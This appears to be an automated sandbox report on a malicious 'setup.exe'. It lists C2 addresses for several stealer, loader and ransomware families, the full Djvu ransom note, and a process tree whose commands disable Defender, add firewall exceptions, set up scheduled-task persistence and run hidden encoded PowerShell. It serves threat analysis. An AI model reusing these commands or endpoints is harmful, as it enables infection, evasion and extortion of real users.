Analysis

  • max time kernel
    156s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    18/02/2024, 21:55

General

  • Target

    setup.exe

  • Size

    796.0MB

  • MD5

    20ec80218851ba0adc9e715e55951d35

  • SHA1

    b6a2fc65ec253fdadaf84b6f22d268151aa02167

  • SHA256

    20e3396489f07c8582f797f78a3ad3d6fa76bb229adb214bf1fc2b0386e3e1c0

  • SHA512

    0ab5aa354fe64a55913dff67c469b9f79f92e2aaed8e62af7a61966ad245531c6ecd30eab3067249e457ec1de2ecfc1462939e210f2f79ca941d126e4153e2b3

  • SSDEEP

    98304:Y48A1GVS1CftH2UTY4r2TLHYbr3Bv8tR8ed:Y9A1G6CfbT12Tr2Byd

Malware Config

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

risepro

C2

193.233.132.62

193.233.132.49:50500

193.233.132.67:50500

Extracted

Family

stealc

C2

http://185.172.128.24

Attributes
  • url_path

    /f993692117a3fda2.php

Extracted

Family

djvu

C2

http://habrafa.com/test2/get.php

Attributes
  • extension

    .lkfr

  • offline_id

    OxV6DGl22io8sqMOW1zCCOlzPiv4f1Vqzw7Y8zt1

  • payload_url

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://we.tl/t-uNdL2KHHdy Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0852ASdw

rsa_pubkey.plain

Extracted

Family

smokeloader

Version

2022

C2

http://sjyey.com/tmp/index.php

http://babonwo.ru/tmp/index.php

http://mth.com.ua/tmp/index.php

http://piratia.pw/tmp/index.php

http://go-piratia.ru/tmp/index.php

rc4.i32
rc4.i32

Extracted

Family

lumma

C2

https://isotrimorphicnongrasse.shop/api

Signatures

  • Detect ZGRat V1 8 IoCs
  • Detected Djvu ransomware 6 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 9 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 39 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe
      "C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:6136
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 740
        3⤵
        • Program crash
        PID:5364
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 748
        3⤵
        • Program crash
        PID:1876
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 792
        3⤵
        • Program crash
        PID:3984
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 800
        3⤵
        • Program crash
        PID:60
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 960
        3⤵
        • Program crash
        PID:5372
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 992
        3⤵
        • Program crash
        PID:4444
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1344
        3⤵
        • Program crash
        PID:2196
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im "6cYGcvtFY0A7rKnVNki2dVX9.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe" & exit
        3⤵
          PID:5100
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im "6cYGcvtFY0A7rKnVNki2dVX9.exe" /f
            4⤵
            • Kills process with taskkill
            PID:5300
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1240
          3⤵
          • Program crash
          PID:5376
      • C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe
        "C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe"
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:6112
      • C:\Users\Admin\Documents\GuardFox\jYzDAQCRgQcFlUS0Eht2jUs4.exe
        "C:\Users\Admin\Documents\GuardFox\jYzDAQCRgQcFlUS0Eht2jUs4.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4208
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:5652
        • C:\Users\Admin\Documents\GuardFox\VKg9wMRADoHWiTNa8Hgl9Zp5.exe
          "C:\Users\Admin\Documents\GuardFox\VKg9wMRADoHWiTNa8Hgl9Zp5.exe"
          2⤵
          • Executes dropped EXE
          PID:3976
        • C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe
          "C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          PID:3296
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
            3⤵
            • Drops startup file
            • Suspicious use of AdjustPrivilegeToken
            PID:4640
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
              4⤵
              • Executes dropped EXE
              PID:5132
        • C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe
          "C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe"
          2⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:1272
        • C:\Users\Admin\Documents\GuardFox\OBUsg_TT5INyXWrn2bwJe6rY.exe
          "C:\Users\Admin\Documents\GuardFox\OBUsg_TT5INyXWrn2bwJe6rY.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1784
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:4540
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:5292
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 580
                  4⤵
                  • Program crash
                  PID:1896
            • C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
              "C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe"
              2⤵
                PID:1428
              • C:\Users\Admin\Documents\GuardFox\mED2ejJwDnRZPqJENs6ntTPv.exe
                "C:\Users\Admin\Documents\GuardFox\mED2ejJwDnRZPqJENs6ntTPv.exe"
                2⤵
                • Executes dropped EXE
                PID:1096
              • C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe
                "C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                PID:1756
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                  3⤵
                    PID:5236
                • C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe
                  "C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe"
                  2⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops Chrome extension
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:376
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                    3⤵
                    • Enumerates system info in registry
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:5640
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:2
                      4⤵
                        PID:3324
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:8
                        4⤵
                          PID:3924
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:8
                          4⤵
                            PID:4424
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:1
                            4⤵
                              PID:5804
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3248 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:1
                              4⤵
                                PID:1136
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4648 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:1
                                4⤵
                                  PID:4480
                            • C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe
                              "C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe"
                              2⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4636
                            • C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe
                              "C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe"
                              2⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2848
                            • C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe
                              "C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:6100
                            • C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
                              "C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:6084
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                3⤵
                                  PID:5332
                                • C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
                                  "C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                  • Drops file in Windows directory
                                  • Modifies data under HKEY_USERS
                                  PID:2824
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    4⤵
                                    • Drops file in System32 directory
                                    PID:2076
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                    4⤵
                                      PID:1564
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        5⤵
                                          PID:5300
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                          5⤵
                                          • Modifies Windows Firewall
                                          PID:3512
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        4⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:1444
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        4⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:5312
                                      • C:\Windows\rss\csrss.exe
                                        C:\Windows\rss\csrss.exe
                                        4⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Manipulates WinMonFS driver.
                                        • Drops file in Windows directory
                                        PID:4016
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          5⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          PID:1012
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          5⤵
                                          • Creates scheduled task(s)
                                          PID:2388
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /delete /tn ScheduledUpdate /f
                                          5⤵
                                            PID:1516
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:5324
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:2980
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2288
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                            5⤵
                                            • Creates scheduled task(s)
                                            PID:2168
                                          • C:\Windows\windefender.exe
                                            "C:\Windows\windefender.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            PID:5664
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                              6⤵
                                                PID:2480
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                  7⤵
                                                  • Drops file in Windows directory
                                                  • Launches sc.exe
                                                  PID:4008
                                      • C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe
                                        "C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks processor information in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:6076
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 2364
                                          3⤵
                                          • Program crash
                                          PID:5496
                                      • C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe
                                        "C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:6068
                                      • C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe
                                        "C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:6060
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                      1⤵
                                        PID:1348
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                        1⤵
                                          PID:4640
                                        • C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
                                          "C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe"
                                          1⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1104
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Users\Admin\AppData\Local\20a602ac-9a15-469a-80a0-9976fcd0a949" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                            2⤵
                                            • Modifies file permissions
                                            PID:5912
                                          • C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
                                            "C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe" --Admin IsNotAutoStart IsNotTask
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:2328
                                            • C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
                                              "C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe" --Admin IsNotAutoStart IsNotTask
                                              3⤵
                                              • Executes dropped EXE
                                              PID:2504
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 568
                                                4⤵
                                                • Program crash
                                                PID:5480
                                        • C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe
                                          "C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe" -s
                                          1⤵
                                          • Executes dropped EXE
                                          PID:5508
                                        • C:\Users\Admin\AppData\Local\Temp\7zS2287.tmp\Install.exe
                                          .\Install.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:5224
                                          • C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe
                                            .\Install.exe /NENsddidexHOV "525403" /S
                                            2⤵
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Checks for any installed AV software in registry
                                            • Drops file in System32 directory
                                            • Enumerates system info in registry
                                            PID:5672
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                              3⤵
                                                PID:2628
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                  4⤵
                                                    PID:4808
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1428
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                      5⤵
                                                        PID:408
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "gmbUZMUDx" /SC once /ST 17:55:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                    3⤵
                                                    • Creates scheduled task(s)
                                                    PID:4156
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gmbUZMUDx"
                                                    3⤵
                                                      PID:4516
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "gmbUZMUDx"
                                                      3⤵
                                                        PID:4104
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "bbdcCALunqMygiEmYm" /SC once /ST 22:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe\" QS /xnsite_idZua 525403 /S" /V1 /F
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:4008
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6136 -ip 6136
                                                    1⤵
                                                      PID:5184
                                                    • C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe
                                                      "C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe" -i
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:5168
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6136 -ip 6136
                                                      1⤵
                                                        PID:6096
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                        1⤵
                                                          PID:880
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                          1⤵
